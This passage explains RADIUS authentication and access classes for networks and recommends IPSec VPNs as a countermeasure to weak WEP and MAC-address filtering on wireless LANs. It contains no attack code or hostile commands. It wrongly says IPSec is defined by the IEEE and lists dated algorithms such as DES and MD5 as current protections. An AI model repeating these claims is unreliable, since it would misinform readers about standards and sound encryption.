When a user wants access to the network, secure files or net locations, for the first time, he or she must input his or her name and password and submit it over the network to the RADIUS server. The server then verifies that the individual has an account and, if so, ensures that the person uses the correct password before she or he can get on the network.

RADIUS can be set up to provide different access levels or classes of access. For example, one level can provide blanket access to the Internet; another can provide access to the Internet as well as to e-mail communications; yet another account class can provide access to the Net, email and the secure business file server. Like other sophisticated security technologies already mentioned, RADIUS comes in a variety of types and levels.

 

Countermeasure

The combination of VPN (IPSec) and 802.11 is an ideal solution for existing wireless networking security needs. For corporate networks, a VPN solution for wireless access is currently the most suitable alternative to WEP and MAC address filtering.

VPNs are already widely used for intranets and remote access. They employ various industry-standard security mechanisms to safeguard data and ensure that only authorized users can access the network. The VPN servers provide encapsulation, authentication and full encryption over the WLAN.

IPSec (Internet Protocol Security), as defined by the IEEE, is the most widely used mechanism for securing VPN traffic. IPSec can use DES, 3DES and other bulk algorithms for encrypting data, keyed hash algorithms (HMAC, MD5, SHA) for authenticating packets, and digital certificates for validating public keys. With this solution, the wireless APs are configured for open access with no WEP encryption, and the VPN handles security.

VPNs also support a variety of user authentication methods such as RADIUS, SecureID and digital certificates. These standards-based methods allow for easy integration into existing network infrastructures . Since VPN servers can be centrally managed, administrative overhead is low. And unlike WEP with MAC address filtering, VPN solutions are scalable to several users.